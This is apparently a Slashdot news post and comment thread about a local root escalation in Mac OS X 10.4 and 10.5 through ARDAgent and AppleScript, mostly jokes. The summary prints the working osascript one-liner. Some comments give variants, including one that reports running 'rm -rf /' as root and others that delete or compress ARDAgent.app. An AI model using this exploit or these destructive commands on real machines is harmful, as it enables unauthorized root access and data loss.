Mac OS X Root Escalation Through AppleScript

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

Re:Can we get some sources?

[Anonymous Coward]

who needs a source, it works. tried on my mac, output is: root

so i tried replacing "whoami" with "rm -rf /" and

!@#ca$a%H&(
+++NO CARRIER

Yes, but does it run on Linux^H^H^H^H^H

[davidwr]

Yes, but does it run on Linux^H^H^H^H^Hcoffee-makers?

Re:This is a serious privilege escalation bug, but

[Applekid]

. . . It's a classic blunder, like getting into a land war in Asia . . . 99 44/100 percent . . . Security is like sex. Once you're penetrated you're ****ed.

You are now my new favorite poster.

Re:This is a serious privilege escalation bug, but

[smitty97]

And I am about 99 44/100 percent sure that there's more undiscovered holes like this in OS X, Windows Vista, and any random Linux desktop you could name.

I found another privelege escalation!

$ su
Password:
#

Re:I confirmed it to.

[Gewalt]

My IQ is 162 and I didn't get your joke. Just how smart do you have to be to get that one?

Re:I confirmed it to.

[Poltras]

You have to have a UID lower than your own IQ, or the IQ of the poster. At least that's what I was told.

Re:It's easier than that..

[That's What She Said]

That seems fair, but 1337 H4X0RZ D0 I7 WI7H 57YL3!

What's the harm of this?

[commodoresloat]

Is it really bad for an attacker to find out who I am using this "whoami" thingy?

Re:This is a serious privilege escalation bug, but

[AndrewNeo]

Mine's even worse than yours!
$ sudo su
#

Re:Oh good

[Free the Cowards]

Sarcasm does not make you more handsome or bring you favor with the ladies.

Re:Oh good

[robfoo]

Yeah, right.

I'm a Mac. And I'm a PC

[patio11]

Mac: Oh %$#& %$#& %$#& %$#&.

PC: I can relate.

Mac: No!! %$#& %$#& %$#&

PC: Don't feel so glum, Mac, it happens to everyone once in a while. Look at it this way -- its a sign you're growing up.

Mac: NOOOOOOOOOOOOOOOOOOOOOOOOOO.

PC: You know, they can do wonderful things these days with firewall software.

Mac: I want to cut myself.

PC: Not a good idea as a root user, Mac.

Mac: *glowers*

PC: I only kid because I love you.

Re:Recipe for neutralizing it

[eikonos]

Why use sudo when you could just use the ARDAgent hack instead?
osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';

Re:Recipe for neutralizing it

[aetherworld]

Nononono....

it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';

Re:Can we get some sources?

[Anonymous Coward]

+++ doesn't precede NO CARRIER like that. It's for switching your terminal mode to issue AT commands directly to the modem. For example if you type +++ATH^æéWÔ5áX6Ë\SSÎh@'ÖØ

NO CARRIER

Re:Oh good

[Sentry21]

Oh! A sarcasm detector! THAT'S useful.